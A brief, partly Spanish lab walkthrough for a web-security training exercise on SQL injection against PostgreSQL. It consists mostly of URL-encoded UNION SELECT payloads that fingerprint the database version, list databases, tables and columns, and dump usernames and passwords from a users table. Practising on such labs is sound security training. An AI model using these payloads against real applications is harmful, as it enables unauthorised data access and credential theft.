05 - SQL injection attack, listing the database contents on non-Oracle databases

'+UNION+SELECT+version(),version()+--+-

Postgress found

https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet

Extraer los nombres de las bases de datos

'+UNION+SELECT+datname,'a'+FROM+pg_database+--+- 

Listar nombre de las tablas

SELECT table_schema, table_name
FROM information_schema.tables
WHERE table_type = 'BASE TABLE' AND table_schema NOT IN ('pg_catalog', 'information_schema');

Listar nombre de las columnas

SELECT column_name, data_type, is_nullable
FROM information_schema.columns
WHERE table_schema = 'public' AND table_name = 'nombre_tabla';

'+UNION+SELECT+column_name,data_type+FROM+information_schema.columns+WHERE+table_schema+=+'public'+AND+table_name+=+'users_pssqck'+--+-

Listar datos

'+UNION+SELECT+username_wbpptu,password_uvrxkv+FROM+users_pssqck+--+-